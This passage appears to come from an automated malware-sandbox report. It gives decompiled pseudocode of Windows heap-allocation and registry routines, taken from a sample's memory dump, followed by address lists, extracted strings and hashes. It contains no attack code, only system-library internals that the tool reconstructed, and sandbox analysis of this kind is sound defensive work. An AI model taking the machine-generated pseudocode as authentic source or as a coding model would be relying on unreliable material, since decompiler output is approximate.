                                                        											E018AA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                        											_t533 = _v48;
                                                        											_t402 = _v32;
                                                        										}
                                                        										_t449 = _t402;
                                                        									}
                                                        									_t533[3] = _t449;
                                                        									E0180A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                        									_t447 = 0x7ffe0380;
                                                        								}
                                                        							}
                                                        							_t367 = E01807D50();
                                                        							__eflags = _t367;
                                                        							if(_t367 != 0) {
                                                        								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        							} else {
                                                        								_t370 = _t447;
                                                        							}
                                                        							__eflags =  *_t370;
                                                        							if( *_t370 != 0) {
                                                        								_t371 =  *[fs:0x30];
                                                        								__eflags =  *(_t371 + 0x240) & 1;
                                                        								if(( *(_t371 + 0x240) & 1) != 0) {
                                                        									__eflags = E01807D50();
                                                        									if(__eflags != 0) {
                                                        										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        									}
                                                        									E018A1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                        								}
                                                        							}
                                                        							_t372 = E01807D50();
                                                        							_t546 = 0x7ffe038a;
                                                        							_t446 = 0x230;
                                                        							__eflags = _t372;
                                                        							if(_t372 != 0) {
                                                        								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                        							} else {
                                                        								_t246 = 0x7ffe038a;
                                                        							}
                                                        							__eflags =  *_t246;
                                                        							if( *_t246 == 0) {
                                                        								goto L7;
                                                        							} else {
                                                        								__eflags = E01807D50();
                                                        								if(__eflags != 0) {
                                                        									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                        									__eflags = _t546;
                                                        								}
                                                        								_push( *_t546 & 0x000000ff);
                                                        								_push(_v36);
                                                        								_push(_v40);
                                                        								goto L120;
                                                        							}
                                                        						}
                                                        					} else {
                                                        						L19:
                                                        						_t31 = _t513 + 0x101f; // 0x101f
                                                        						_t455 = _t31 & 0xfffff000;
                                                        						_t32 = _t513 + 0x28; // 0x28
                                                        						_v44 = _t455;
                                                        						__eflags = _t455 - _t32;
                                                        						if(_t455 == _t32) {
                                                        							_t455 = _t455 + 0x1000;
                                                        							_v44 = _t455;
                                                        						}
                                                        						_t265 = _t445 << 3;
                                                        						_v24 = _t265;
                                                        						_t266 = _t265 + _t513;
                                                        						__eflags = _v40;
                                                        						_v20 = _t266;
                                                        						if(_v40 == 0) {
                                                        							_t266 = _t266 + 0xfffffff0;
                                                        							__eflags = _t266;
                                                        						}
                                                        						_t267 = _t266 & 0xfffff000;
                                                        						_v52 = _t267;
                                                        						__eflags = _t267 - _t455;
                                                        						if(_t267 < _t455) {
                                                        							__eflags =  *0x18d8748 - 1; // 0x0
                                                        							if(__eflags < 0) {
                                                        								L9:
                                                        								_t450 = _t553;
                                                        								L10:
                                                        								_push(_t445);
                                                        								goto L11;
                                                        							}
                                                        							__eflags = _v40;
                                                        							L146:
                                                        							if(__eflags == 0) {
                                                        								goto L9;
                                                        							}
                                                        							_t270 =  *[fs:0x30];
                                                        							__eflags =  *(_t270 + 0xc);
                                                        							if( *(_t270 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E017EB150();
                                                        							} else {
                                                        								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push("(!TrailingUCR)");
                                                        							E017EB150();
                                                        							__eflags =  *0x18d7bc8;
                                                        							if( *0x18d7bc8 == 0) {
                                                        								__eflags = 0;
                                                        								E018A2073(_t445, 1, _t541, 0);
                                                        							}
                                                        							L152:
                                                        							_t445 = _a4;
                                                        							L153:
                                                        							_t513 = _v48;
                                                        							goto L9;
                                                        						}
                                                        						_v32 = _t267;
                                                        						_t280 = _t267 - _t455;
                                                        						_v32 = _v32 - _t455;
                                                        						__eflags = _a8;
                                                        						_t460 = _v32;
                                                        						_v52 = _t460;
                                                        						if(_a8 != 0) {
                                                        							L27:
                                                        							__eflags = _t280;
                                                        							if(_t280 == 0) {
                                                        								L33:
                                                        								_t446 = 0;
                                                        								__eflags = _v40;
                                                        								if(_v40 == 0) {
                                                        									_t468 = _v44 + _v52;
                                                        									_v36 = _t468;
                                                        									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                        									__eflags = _v20 - _v52 + _v44;
                                                        									if(_v20 == _v52 + _v44) {
                                                        										__eflags =  *(_t553 + 0x4c);
                                                        										if( *(_t553 + 0x4c) != 0) {
                                                        											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                        											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                        										}
                                                        									} else {
                                                        										_t468[3] = 0;
                                                        										_t468[1] = 0;
                                                        										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                        										_t521 = _t317;
                                                        										 *_t468 = _t317;
                                                        										__eflags =  *0x18d8748 - 1; // 0x0
                                                        										if(__eflags >= 0) {
                                                        											__eflags = _t521 - 1;
                                                        											if(_t521 <= 1) {
                                                        												_t327 =  *[fs:0x30];
                                                        												__eflags =  *(_t327 + 0xc);
                                                        												if( *(_t327 + 0xc) == 0) {
                                                        													_push("HEAP: ");
                                                        													E017EB150();
                                                        												} else {
                                                        													E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        												}
                                                        												_push("(LONG)FreeEntry->Size > 1");
                                                        												E017EB150();
                                                        												__eflags =  *0x18d7bc8 - _t446; // 0x0
                                                        												if(__eflags == 0) {
                                                        													__eflags = 1;
                                                        													E018A2073(_t446, 1, _t541, 1);
                                                        												}
                                                        												_t468 = _v36;
                                                        											}
                                                        										}
                                                        										_t468[1] = _t446;
                                                        										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                        										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                        										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                        											_t320 = _t446;
                                                        										} else {
                                                        											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                        											_v12 = _t320;
                                                        											__eflags = _t320 - 0xfe;
                                                        											if(_t320 >= 0xfe) {
                                                        												_push(_t468);
                                                        												_push(_t446);
                                                        												E018AA80D(_t522, 3, _t468, _t541);
                                                        												_t468 = _v52;
                                                        												_t320 = _v28;
                                                        											}
                                                        										}
                                                        										_t468[3] = _t320;
                                                        										E0180A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                        									}
                                                        								}
                                                        								E0180B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                        								E0180A830(_t553, _v64, _v24);
                                                        								_t286 = E01807D50();
                                                        								_t542 = 0x7ffe0380;
                                                        								__eflags = _t286;
                                                        								if(_t286 != 0) {
                                                        									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        								} else {
                                                        									_t289 = 0x7ffe0380;
                                                        								}
                                                        								__eflags =  *_t289;
                                                        								if( *_t289 != 0) {
                                                        									_t290 =  *[fs:0x30];
                                                        									__eflags =  *(_t290 + 0x240) & 1;
                                                        									if(( *(_t290 + 0x240) & 1) != 0) {
                                                        										__eflags = E01807D50();
                                                        										if(__eflags != 0) {
                                                        											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        										}
                                                        										E018A1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                        									}
                                                        								}
                                                        								_t291 = E01807D50();
                                                        								_t543 = 0x7ffe038a;
                                                        								__eflags = _t291;
                                                        								if(_t291 != 0) {
                                                        									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                        								} else {
                                                        									_t246 = 0x7ffe038a;
                                                        								}
                                                        								__eflags =  *_t246;
                                                        								if( *_t246 != 0) {
                                                        									__eflags = E01807D50();
                                                        									if(__eflags != 0) {
                                                        										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                        										__eflags = _t543;
                                                        									}
                                                        									_push( *_t543 & 0x000000ff);
                                                        									_push(_t446);
                                                        									_push(_t446);
                                                        									L120:
                                                        									_push( *(_t553 + 0x74) << 3);
                                                        									_push(_v52);
                                                        									_t246 = E018A1411(_t446, _t553, _v44, __eflags);
                                                        								}
                                                        								goto L7;
                                                        							}
                                                        							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                        							_t339 = E0181174B( &_v44,  &_v52, 0x4000);
                                                        							__eflags = _t339;
                                                        							if(_t339 < 0) {
                                                        								L94:
                                                        								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                        								__eflags = _v40;
                                                        								if(_v40 == 0) {
                                                        									goto L153;
                                                        								}
                                                        								E0180B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                        								goto L152;
                                                        							}
                                                        							_t344 = E01807D50();
                                                        							__eflags = _t344;
                                                        							if(_t344 != 0) {
                                                        								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        							} else {
                                                        								_t347 = 0x7ffe0380;
                                                        							}
                                                        							__eflags =  *_t347;
                                                        							if( *_t347 != 0) {
                                                        								_t348 =  *[fs:0x30];
                                                        								__eflags =  *(_t348 + 0x240) & 1;
                                                        								if(( *(_t348 + 0x240) & 1) != 0) {
                                                        									E018A14FB(_t445, _t553, _v44, _v52, 6);
                                                        								}
                                                        							}
                                                        							_t513 = _v48;
                                                        							goto L33;
                                                        						}
                                                        						__eflags =  *_v12 - 3;
                                                        						_t513 = _v48;
                                                        						if( *_v12 == 3) {
                                                        							goto L27;
                                                        						}
                                                        						__eflags = _t460;
                                                        						if(_t460 == 0) {
                                                        							goto L9;
                                                        						}
                                                        						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                        						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                        							goto L9;
                                                        						}
                                                        						goto L27;
                                                        					}
                                                        				}
                                                        				_t445 = _a4;
                                                        				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                        					_t513 = __edx;
                                                        					goto L10;
                                                        				}
                                                        				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                        				_v20 = _t433;
                                                        				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                        					_t513 = _t539;
                                                        					goto L9;
                                                        				} else {
                                                        					_t437 = E018099BF(__ecx, __edx,  &_a4, 0);
                                                        					_t445 = _a4;
                                                        					_t514 = _t437;
                                                        					_v56 = _t514;
                                                        					if(_t445 - 0x201 > 0xfbff) {
                                                        						goto L14;
                                                        					} else {
                                                        						E0180A830(__ecx, _t514, _t445);
                                                        						_t506 =  *(_t553 + 0x238);
                                                        						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                        						_t246 = _t506 >> 4;
                                                        						if(_t551 < _t506 - _t246) {
                                                        							_t508 =  *(_t553 + 0x23c);
                                                        							_t246 = _t508 >> 2;
                                                        							__eflags = _t551 - _t508 - _t246;
                                                        							if(_t551 > _t508 - _t246) {
                                                        								_t246 = E0181ABD8(_t553);
                                                        								 *(_t553 + 0x23c) = _t551;
                                                        								 *(_t553 + 0x238) = _t551;
                                                        							}
                                                        						}
                                                        						goto L7;
                                                        					}
                                                        				}
                                                        			}



















































































                                                        0x01852103
                                                        0x01852109
                                                        0x0185210f
                                                        0x01852112
                                                        0x01852131
                                                        0x01852136
                                                        0x01852114
                                                        0x01852129
                                                        0x0185212e
                                                        0x0185213c
                                                        0x01852141
                                                        0x01852147
                                                        0x0185214d
                                                        0x01852151
                                                        0x01852154
                                                        0x01852154
                                                        0x01852159
                                                        0x01852159
                                                        0x01852103
                                                        0x0180a55f
                                                        0x0180a562
                                                        0x0180a565
                                                        0x0180a567
                                                        0x01852162
                                                        0x0180a56d
                                                        0x0180a574
                                                        0x0180a575
                                                        0x0180a579
                                                        0x0180a57e
                                                        0x01852169
                                                        0x0185216a
                                                        0x01852170
                                                        0x01852175
                                                        0x01852179
                                                        0x01852179
                                                        0x0180a57e
                                                        0x0180a584
                                                        0x0180a58f
                                                        0x0180a58f
                                                        0x0180a52b
                                                        0x0180a5ad
                                                        0x0180a5bc
                                                        0x0180a5c1
                                                        0x0180a5c6
                                                        0x0180a5cb
                                                        0x0180a5cd
                                                        0x018521a9
                                                        0x0180a5d3
                                                        0x0180a5d3
                                                        0x0180a5d3
                                                        0x0180a5d5
                                                        0x0180a5d8
                                                        0x018521b3
                                                        0x018521bc
                                                        0x018521c2
                                                        0x018521cd
                                                        0x018521cf
                                                        0x018521da
                                                        0x018521da
                                                        0x018521da
                                                        0x018521f7
                                                        0x018521f7
                                                        0x018521c2
                                                        0x0180a5de
                                                        0x0180a5e3
                                                        0x0180a5e8
                                                        0x0180a5ea
                                                        0x0185220a
                                                        0x0180a5f0
                                                        0x0180a5f0
                                                        0x0180a5f0
                                                        0x0180a5f2
                                                        0x0180a5f5
                                                        0x01852219
                                                        0x0185221b
                                                        0x0185208c
                                                        0x0185208c
                                                        0x0185208c
                                                        0x01852095
                                                        0x01852096
                                                        0x01852097
                                                        0x01852098
                                                        0x018520a4
                                                        0x018520a5
                                                        0x018520a9
                                                        0x018520a9
                                                        0x00000000
                                                        0x0180a5f5
                                                        0x0180a4bf
                                                        0x0180a4d3
                                                        0x0180a4d8
                                                        0x0180a4da
                                                        0x01851ede
                                                        0x01851ede
                                                        0x01851ee4
                                                        0x01851ee9
                                                        0x00000000
                                                        0x00000000
                                                        0x01851f07
                                                        0x00000000
                                                        0x01851f07
                                                        0x0180a4e0
                                                        0x0180a4e5
                                                        0x0180a4e7
                                                        0x018520cb
                                                        0x0180a4ed
                                                        0x0180a4ed
                                                        0x0180a4ed
                                                        0x0180a4f2
                                                        0x0180a4f5
                                                        0x018520d5
                                                        0x018520de
                                                        0x018520e4
                                                        0x018520f6
                                                        0x018520f6
                                                        0x018520e4
                                                        0x0180a4fb
                                                        0x00000000
                                                        0x0180a4fb
                                                        0x0180a4a1
                                                        0x0180a4a4
                                                        0x0180a4a8
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a4aa
                                                        0x0180a4ac
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a4b2
                                                        0x0180a4b5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a4b5
                                                        0x0180a43a
                                                        0x0180a340
                                                        0x0180a346
                                                        0x0180a600
                                                        0x00000000
                                                        0x0180a600
                                                        0x0180a34f
                                                        0x0180a351
                                                        0x0180a358
                                                        0x0180a3c6
                                                        0x00000000
                                                        0x0180a371
                                                        0x0180a37a
                                                        0x0180a37f
                                                        0x0180a382
                                                        0x0180a384
                                                        0x0180a394
                                                        0x00000000
                                                        0x0180a396
                                                        0x0180a399
                                                        0x0180a3a7
                                                        0x0180a3b0
                                                        0x0180a3b4
                                                        0x0180a3bb
                                                        0x0180a3d2
                                                        0x0180a3da
                                                        0x0180a3df
                                                        0x0180a3e1
                                                        0x0180a3e5
                                                        0x0180a3ea
                                                        0x0180a3f0
                                                        0x0180a3f0
                                                        0x0180a3e1
                                                        0x00000000
                                                        0x0180a3bb
                                                        0x0180a394

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-523794902
                                                        • Opcode ID: 4228ad90d454caf46228d07a99adb210c05fdc5d9ff5d9d6e5360c461cb5d6cb
                                                        • Instruction ID: ebb9458fe18c917cbf2a01b899234760be1fe542d344c7ca658b99529b91122b
                                                        • Opcode Fuzzy Hash: 4228ad90d454caf46228d07a99adb210c05fdc5d9ff5d9d6e5360c461cb5d6cb
                                                        • Instruction Fuzzy Hash: 9342E1312057859FD75ACF28C888B2ABBE6FF88704F04496DE986CB391D734DA41CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E018A2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                        				signed int _t83;
                                                        				signed char _t89;
                                                        				intOrPtr _t90;
                                                        				signed char _t101;
                                                        				signed int _t102;
                                                        				intOrPtr _t104;
                                                        				signed int _t105;
                                                        				signed int _t106;
                                                        				intOrPtr _t108;
                                                        				intOrPtr _t112;
                                                        				short* _t130;
                                                        				short _t131;
                                                        				signed int _t148;
                                                        				intOrPtr _t149;
                                                        				signed int* _t154;
                                                        				short* _t165;
                                                        				signed int _t171;
                                                        				void* _t182;
                                                        
                                                        				_push(0x44);
                                                        				_push(0x18c0e80);
                                                        				E0183D0E8(__ebx, __edi, __esi);
                                                        				_t177 = __edx;
                                                        				_t181 = __ecx;
                                                        				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                        				 *((char*)(_t182 - 0x1d)) = 0;
                                                        				 *(_t182 - 0x24) = 0;
                                                        				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                        					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                        					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                        					_t83 = E017E40E1("RtlAllocateHeap");
                                                        					__eflags = _t83;
                                                        					if(_t83 == 0) {
                                                        						L48:
                                                        						 *(_t182 - 0x24) = 0;
                                                        						L49:
                                                        						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                        						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                        						E018A30C4();
                                                        						goto L50;
                                                        					}
                                                        					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                        					 *(_t182 - 0x28) = _t89;
                                                        					 *(_t182 - 0x3c) = _t89;
                                                        					_t177 =  *(_t182 + 8);
                                                        					__eflags = _t177;
                                                        					if(_t177 == 0) {
                                                        						_t171 = 1;
                                                        						__eflags = 1;
                                                        					} else {
                                                        						_t171 = _t177;
                                                        					}
                                                        					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                        					__eflags = _t148 - 0x10;
                                                        					if(_t148 < 0x10) {
                                                        						_t148 = 0x10;
                                                        					}
                                                        					_t149 = _t148 + 8;
                                                        					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                        					__eflags = _t149 - _t177;
                                                        					if(_t149 < _t177) {
                                                        						L44:
                                                        						_t90 =  *[fs:0x30];
                                                        						__eflags =  *(_t90 + 0xc);
                                                        						if( *(_t90 + 0xc) == 0) {
                                                        							_push("HEAP: ");
                                                        							E017EB150();
                                                        						} else {
                                                        							E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        						}
                                                        						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                        						E017EB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                        						goto L48;
                                                        					} else {
                                                        						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                        						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                        							goto L44;
                                                        						}
                                                        						__eflags = _t89 & 0x00000001;
                                                        						if((_t89 & 0x00000001) != 0) {
                                                        							_t178 =  *(_t182 - 0x28);
                                                        						} else {
                                                        							E017FEEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                        							 *((char*)(_t182 - 0x1d)) = 1;
                                                        							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                        							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                        						}
                                                        						E018A4496(_t181, 0);
                                                        						_t177 = E01804620(_t181, _t181, _t178,  *(_t182 + 8));
                                                        						 *(_t182 - 0x24) = _t177;
                                                        						_t173 = 1;
                                                        						E018A49A4(_t181);
                                                        						__eflags = _t177;
                                                        						if(_t177 == 0) {
                                                        							goto L49;
                                                        						} else {
                                                        							_t177 = _t177 + 0xfffffff8;
                                                        							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                        							if( *((char*)(_t177 + 7)) == 5) {
                                                        								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                        								__eflags = _t177;
                                                        							}
                                                        							_t154 = _t177;
                                                        							 *(_t182 - 0x40) = _t177;
                                                        							__eflags =  *(_t181 + 0x4c);
                                                        							if( *(_t181 + 0x4c) != 0) {
                                                        								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                        								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                        								if(__eflags != 0) {
                                                        									_push(_t154);
                                                        									_t173 = _t177;
                                                        									E0189FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                        								}
                                                        							}
                                                        							__eflags =  *(_t177 + 2) & 0x00000002;
                                                        							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                        								_t101 =  *(_t177 + 3);
                                                        								 *(_t182 - 0x29) = _t101;
                                                        								_t102 = _t101 & 0x000000ff;
                                                        							} else {
                                                        								_t130 = E017E1F5B(_t177);
                                                        								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                        								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                        								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                        									 *_t130 = 0;
                                                        								} else {
                                                        									_t131 = E018116C7(1, _t173);
                                                        									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                        									 *_t165 = _t131;
                                                        									_t130 = _t165;
                                                        								}
                                                        								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                        							}
                                                        							 *(_t182 - 0x34) = _t102;
                                                        							 *(_t182 - 0x28) = _t102;
                                                        							__eflags =  *(_t181 + 0x4c);
                                                        							if( *(_t181 + 0x4c) != 0) {
                                                        								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                        								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                        								__eflags =  *_t177;
                                                        							}
                                                        							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                        							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                        								__eflags = 0;
                                                        								E018A4496(_t181, 0);
                                                        							}
                                                        							__eflags =  *(_t182 - 0x24) -  *0x18d6360; // 0x0
                                                        							_t104 =  *[fs:0x30];
                                                        							if(__eflags != 0) {
                                                        								_t105 =  *(_t104 + 0x68);
                                                        								 *(_t182 - 0x4c) = _t105;
                                                        								__eflags = _t105 & 0x00000800;
                                                        								if((_t105 & 0x00000800) == 0) {
                                                        									goto L49;
                                                        								}
                                                        								_t106 =  *(_t182 - 0x34);
                                                        								__eflags = _t106;
                                                        								if(_t106 == 0) {
                                                        									goto L49;
                                                        								}
                                                        								__eflags = _t106 -  *0x18d6364; // 0x0
                                                        								if(__eflags != 0) {
                                                        									goto L49;
                                                        								}
                                                        								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x18d6366; // 0x0
                                                        								if(__eflags != 0) {
                                                        									goto L49;
                                                        								}
                                                        								_t108 =  *[fs:0x30];
                                                        								__eflags =  *(_t108 + 0xc);
                                                        								if( *(_t108 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push(E0188D455(_t181,  *(_t182 - 0x28)));
                                                        								_push( *(_t182 + 8));
                                                        								E017EB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                        								goto L34;
                                                        							} else {
                                                        								__eflags =  *(_t104 + 0xc);
                                                        								if( *(_t104 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push( *(_t182 + 8));
                                                        								E017EB150("Just allocated block at %p for %Ix bytes\n",  *0x18d6360);
                                                        								L34:
                                                        								_t112 =  *[fs:0x30];
                                                        								__eflags =  *((char*)(_t112 + 2));
                                                        								if( *((char*)(_t112 + 2)) != 0) {
                                                        									 *0x18d6378 = 1;
                                                        									 *0x18d60c0 = 0;
                                                        									asm("int3");
                                                        									 *0x18d6378 = 0;
                                                        								}
                                                        								goto L49;
                                                        							}
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_t181 =  *0x18d5708; // 0x0
                                                        					 *0x18db1e0(__ecx, __edx,  *(_t182 + 8));
                                                        					 *_t181();
                                                        					L50:
                                                        					return E0183D130(0, _t177, _t181);
                                                        				}
                                                        			}

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                        • API String ID: 0-1745908468
                                                        • Opcode ID: b12ff6a911709b910fc4cd8deb8101deafd270d59b40b0d1969bc1d0088b28c8
                                                        • Instruction ID: d27f1e3f6d45c8507294c3041cedc1a8d36054314c128dcd83852af747c260c1
                                                        • Opcode Fuzzy Hash: b12ff6a911709b910fc4cd8deb8101deafd270d59b40b0d1969bc1d0088b28c8
                                                        • Instruction Fuzzy Hash: F69100319016499FEB26DFACC494AADFFF2BF49714F98801DE546DB252C7329A81CB01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 74%
                                                        			E0181CCC0(intOrPtr _a4, intOrPtr* _a8, signed int* _a12) {
                                                        				signed int _v8;
                                                        				char _v540;
                                                        				signed int _v544;
                                                        				char _v556;
                                                        				signed int _v560;
                                                        				signed int _v564;
                                                        				intOrPtr _v568;
                                                        				intOrPtr _v572;
                                                        				signed int _v576;
                                                        				char _v580;
                                                        				char _v584;
                                                        				char* _v588;
                                                        				signed int _v590;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				signed int _v600;
                                                        				intOrPtr _v604;
                                                        				signed int _v608;
                                                        				signed int _v612;
                                                        				signed short _v616;
                                                        				intOrPtr _v620;
                                                        				signed int _v624;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* _t76;
                                                        				intOrPtr _t79;
                                                        				signed int _t82;
                                                        				intOrPtr _t84;
                                                        				intOrPtr* _t104;
                                                        				void* _t105;
                                                        				void* _t106;
                                                        				signed int _t109;
                                                        				void* _t112;
                                                        				intOrPtr _t113;
                                                        				void* _t119;
                                                        				signed int _t123;
                                                        				signed int* _t126;
                                                        				void* _t127;
                                                        				signed int _t131;
                                                        				signed int _t133;
                                                        
                                                        				_t133 = (_t131 & 0xfffffff8) - 0x25c;
                                                        				_v8 =  *0x18dd360 ^ _t133;
                                                        				_t104 = _a8;
                                                        				_t126 = _a12;
                                                        				_t76 = _a4 - 1;
                                                        				if(_t76 == 0) {
                                                        					_v580 = 0x18;
                                                        					_push( &_v580);
                                                        					_v568 = 0x40;
                                                        					_push(8);
                                                        					_v600 = 0;
                                                        					_push( &_v600);
                                                        					_v576 = 0;
                                                        					_v572 = 0x17c13a8;
                                                        					_v564 = 0;
                                                        					_v560 = 0;
                                                        					_t79 = E01829600();
                                                        					_v620 = _t79;
                                                        					if(_t79 >= 0 || _t79 == 0xc0000034 || _t79 == 0xc0000189) {
                                                        						_t80 = _v600;
                                                        						 *(_t104 + 0x18) =  *(_t104 + 0x18) | 0xffffffff;
                                                        						 *((intOrPtr*)(_t104 + 8)) = _v600;
                                                        					} else {
                                                        						_push(_t79);
                                                        						_t80 = E01875720(0x33, 0, "SXS: Unable to open registry key %wZ Status = 0x%08lx\n", 0x17c13a8);
                                                        						 *((char*)(_t104 + 0x1c)) = 1;
                                                        						L36:
                                                        						_t133 = _t133 + 0x14;
                                                        						if(_t126 == 0) {
                                                        							L9:
                                                        							_pop(_t119);
                                                        							_pop(_t127);
                                                        							_pop(_t105);
                                                        							return E0182B640(_t80, _t105, _v8 ^ _t133, _t115, _t119, _t127);
                                                        						}
                                                        						_t80 = _v608;
                                                        						L38:
                                                        						 *_t126 = _t80;
                                                        					}
                                                        					goto L9;
                                                        				}
                                                        				_t82 = _t76 - 1;
                                                        				if(_t82 != 0) {
                                                        					_t80 = _t82;
                                                        					if(_t80 == 0 &&  *_t104 != _t80) {
